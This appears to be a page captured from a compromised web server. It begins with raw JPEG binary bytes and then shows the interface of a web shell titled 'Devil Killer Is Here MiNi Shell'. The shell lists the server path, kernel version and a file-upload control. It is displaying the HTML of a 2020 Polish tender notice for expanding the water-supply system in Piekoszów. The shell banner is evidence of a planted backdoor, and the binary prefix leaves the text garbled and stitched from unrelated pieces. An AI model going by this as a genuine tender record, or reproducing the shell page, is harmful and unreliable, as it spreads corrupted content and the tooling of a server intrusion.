JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200928/590351-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 590351-N-2020 z dnia 2020-09-28 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Zakład Usług Komunalnych w Piekoszowie Sp. z o. o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">„Rozbudowa systemu wodociągowego na terenie Gminy Piekoszów”</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie nieobowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie jest współfinansowane ze środków Unii Europejskiej, z Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich w ramach Programu Rozwoju Obszarów Wiejskich na lata 2014-2020, w ramach poddziałania „Wsparcie inwestycji związanych z tworzeniem, ulepszaniem lub rozbudową wszystkich rodzajów małej infrastruktury, w tym inwestycji w energię odnawialną i w oszczędności energii. </span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy">Zgodnie z art. 133 ust. 1 ustawy – PZP, do przedmiotowego zamówienia, jako zamówienia sektorowego w rozumieniu przepisów art. 132 ust. 1 pkt 4 ustawy z ustawy - PZP, nie stosuje się przepisów ustawy - PZP. Przepisy ustawy - PZP mają odpowiednie zastosowanie jedynie w przypadkach wymienionych w SIWZ i regulaminie udzielania zamówień publicznych sektorowych przez „Zakład Usług Komunalnych” w Piekoszowie Sp. z o.o. do których nie stosuje się ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych.</span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Zakład Usług Komunalnych w Piekoszowie Sp. z o. o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">26024197200000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Czarnowska</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu"></span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">26-065</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Piekoszów</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">świętokrzyskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">41 375 14 62</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">prezes@zukpiekoszow.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">41 306 10 12</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url"></span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Zamawiający udzielający zamówień sektorowych</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://zukpiekoszow.naszbip.pl/przetargi oraz https://zukpiekoszow.pl/aktualnosci/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://zukpiekoszow.naszbip.pl/przetargi oraz https://zukpiekoszow.pl/aktualnosci/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">oferty należy składać w formie pisemnej.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Czarnowska 54a, 26-065 Piekoszów</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">„Rozbudowa systemu wodociągowego na terenie Gminy Piekoszów”</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">02/PP/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1)	Przedmiotem zamówienia jest wykonanie zadania inwestycyjnego pn. „Rozbudowa systemu wodociągowego na terenie Gminy Piekoszów”, w trybie „zaprojektuj-wybuduj”.2)	Przedmiot zamówienia dzieli się na dwie niezależne części:a)	Część nr 1 – wykonanie zadania inwestycyjnego pn. „Nowe ujęcie wody w zachodniej części Gminy Piekoszów”, w ramach zamówienia pn. „Rozbudowa systemu wodociągowego na terenie Gminy Piekoszów”, polegającego na zaprojektowaniu i wybudowaniu nowego ujęcia wody wraz z niezbędną infrastrukturą towarzyszącą na terenie gminy Piekoszów w miejscowości Łosienek, na działkach o nr ewid.: 995, 1168/1, obręb 8 – Łosienek; 615, obręb 6 – Lesica; 108, obręb 10 – Łubno; 6, 7, 306, obręb 19 – Wincentów;b)	Część nr 2 – wykonanie zadania inwestycyjnego pn. „Przyłączenie miejscowości Gałęzice, gm. Piekoszów do ujęcia wody w Lesicy i odłączenie od infrastruktury wod.-kan. należącej do Nordkalk Sp. z o.o. Zakład w Miedziance”, w ramach zamówienia pn. „Rozbudowa systemu wodociągowego na terenie Gminy Piekoszów”, polegającego na zaprojektowaniu i wybudowaniu nowej zewnętrznej sieci wodociągowej wraz z uzbrojeniem, niezbędnymi obiektami budowalnymi, technologicznymi, inżynierii wodnej przyłączy dla mieszkańców miejscowości Gałęzice oraz części miejscowości Skałka, położonych w gminie Piekoszów poza aglomeracją. 3)	Część nr 1 zamówienia obejmuje swym zakresem w szczególności:a)	wykonanie prac badawczych i poszukiwawczych, w celu ustalenia najkorzystniejszej lokalizacji na nowy odwiert studni głębinowej, wraz z wykonaniem niezbędnej dokumentacji hydrologicznej (w tym w szczególności opracowanie projektu robót geologicznych z wierceniem studni głębinowej, analiza warunków hydro-geologicznych, badania hydrologiczne, opracowanie projektu hydrogeologicznego studni, głębokości studni, konstrukcji otworu hydrogeologiczno-badawczego, próbne pompowanie, opracowanie powykonawczej dokumentacji hydrologicznej ustalającej zasoby eksploatacyjne ujęcia, analiza ryzyka, opracowanie projektu strefy ochronnej);b)	wykonanie operatu wodnoprawnego na szczególne korzystanie z wód wraz z operatem na wykonanie urządzenia wodnego i uzyskania, w imieniu Zamawiającego, niezbędnych prawomocnych i ostatecznych pozwoleń, w tym pozwolenia wodnoprawnego;c)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego nowego ujęcia wody wraz z niezbędnymi obiektami budowlanymi i technologicznymi oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;d)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego nowej sieci wodociągowej łączącej nowe ujęcia wody z istniejącymi wodociągami wraz z niezbędnymi obiektami budowlanymi i technologicznymi oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;e)	budowę nowego ujęcia wody wraz z niezbędnymi obiektami budowlanymi i technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego, w celu zapewnienia dostarczania wody z nowego ujęcia wody do innych miejscowości z gminy Piekoszów zaopatrywanych w wodę z istniejących ujęć wody (budowa sieci wodociągowej spinającej nowe ujęcie wody z istniejącymi sieciami wodociągowymi ujęć wody w Lesicy, Szczukowicach i Szczukowskich Górkach);f)	budowę nowej sieci wodociągowej z uzbrojeniami i innymi obiektami budowlano-technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego;g)	uzyskanie, w imieniu Zamawiającego, ostatecznego i prawomocnego pozwolenia na użytkowanie lub skutecznego zgłoszenia o zamiarze przystąpienia do użytkowania wraz z niezbędnymi uzgodnieniami organów administracji publicznej, jeśli taki obowiązek wynika z ustawy z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.)h)	zapewnienie wsparcia technicznego i serwisu gwarancyjnego, w tym usuwania wszystkich wad/usterek, maszyn, urządzeń, oprogramowania i instalacji zamontowanych w węźle technologicznym, na warunkach określonych we wzorze umowy, stanowiącym zał. nr 13a do SIWZ, w okresie wskazanym w ofercie wykonawcy (pozacenowe kryterium oceny ofert), jednak w okresie nie krótszym niż 5 lat od dnia bezusterkowego odbioru robót budowlanych.4)	Część nr 2 zamówienia obejmuje swym zakresem w szczególności:a)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego sieci wodociągowej wraz z uzbrojeniem, niezbędnymi obiektami budowalnymi, technologicznymi, inżynierii wodnej przyłączy, oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;b)	budowę sieci wodociągowej oraz odcinków bocznych (przyłączy), z uzbrojeniami i innymi obiektami budowlano-technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego;c)	uzyskanie, w imieniu Zamawiającego, ostatecznego i prawomocnego pozwolenia na użytkowanie lub skutecznego zgłoszenia o zamiarze przystąpienia do użytkowania wraz z niezbędnymi uzgodnieniami organów administracji publicznej, jeśli taki obowiązek wynika z ustawy z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.);d)	zapewnienie wsparcia technicznego i serwisu gwarancyjnego, w tym usuwania wszystkich wad/usterek, maszyn, urządzeń, oprogramowania i instalacji zamontowanych w węźle technologicznym, na warunkach określonych we wzorze umowy, stanowiącym zał. nr 13b do SIWZ, w okresie wskazanym w ofercie wykonawcy (kryterium oceny ofert), jednak w okresie nie krótszym niż 5 lat od dnia bezusterkowego odbioru robót budowlanych.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45200000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45200000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45252126-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45252000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>73000000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>73100000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71000000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71300000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71320000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71330000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>71332000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2022-03-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">Od dnia podpisania umowy do dnia 31 marca 2022 r.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span 